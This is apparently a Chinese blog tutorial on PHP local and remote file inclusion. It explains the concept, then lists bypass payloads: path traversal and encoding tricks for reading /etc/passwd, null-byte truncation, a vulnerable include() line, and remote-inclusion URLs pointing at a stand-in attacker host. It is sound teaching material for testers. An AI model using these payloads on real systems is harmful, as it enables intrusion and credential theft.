4.6 File Inclusion

标签：amp   绕过   禁用   协议封装   判断   一个   递归   详情   利用   

简介

是什么

文件包含，一个简单的例子，和 c 语言 include 一样，将一个文件包含到另一个文件。通常出现在多文件开发，模块化开发的场景下。

文件包含，就是代码中通过某种方法包含了其它文件，可以将另一个文件的内容引入到当前文件。从而可以执行代码。

# 本地文件包含
http://example.com/index.php?page=/etc/passwd

# 远程文件包含
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

根据包含文件的位置，文件包含分为 LFI / RFI 本地文件包含/远程文件包含。

实际中的限制

虽然能包含文件，通常只能包含某个固定范围的文件。

即使能随便包含，通常也找不到存在恶意代码的文件。

远程包含一般是默认禁用，或者代码不支持。

攻击

1. 探测参数入口点。一般而言，参数名、值都比较明显，page= 或 file= 等等。这块可以根据经验进行判断。

2. 绕过代码过滤。常见的绕过方式，见下文。

   以下字典包含了常见的绕过 payload ： windows linux

3. 利用。最终执行代码。

代码防御绕过

绕过原理

某些是利用系统、编程语言、中间件的特性。例如在某些场景下：

 /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.

常见的绕过方式分为以下几种：

• 代码过滤不严谨：

  # 非递归过滤
  http://example.com/index.php?page=....//....//....//etc/passwd
  http://example.com/index.php?page=....\/....\/....\/etc/passwd
  http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
  
  # 若代码是检测前缀
  http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
  
  # 若是黑名单过滤后缀
  shellcode.php/.
  passwd/
  
  # 后缀白名单，利用截断
  http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
  
  # 路径长度截断
  http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
  

• 编码、特殊字符：

  # 若代码在尾部添加文件后缀，可以尝试 00 截断
  http://example.com/index.php?page=../../../etc/passwd%00
  
  
  # 或许可以尝试二次 url 编码
  http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
  http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
  http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
  http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
  
  
  http://example.com/index.php?page=....//....//etc/passwd
  http://example.com/index.php?page=..///////..////..//////etc/passwd
  http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
  

• 若是远程包含，并且代码中固定了文件后缀，此时可以尝试将其化为 url 参数。

  include($_GET[‘file‘].‘.png‘);
  # 那么可以这样传参
  ?file=shell.php?x=1
  ?file=shell.php#x=1
  

利用

php url-wrappers

php 提供的协议封装流，可以将很多东西视为文件。可以扩大文件包含的利用面。关于 php 支持的 wapper 详情见 官方手册

php 中有以下包含函数 require, require_once, include, include_once

php 中与之相关的参数有 allow_url_fopen allow_url_include 分别决定能否使用协议封装流，能否在包含函数处使用。

4.6 File Inclusion

标签：amp   绕过   禁用   协议封装   判断   一个   递归   详情   利用   

原文地址：https://www.cnblogs.com/starrys/p/14660346.html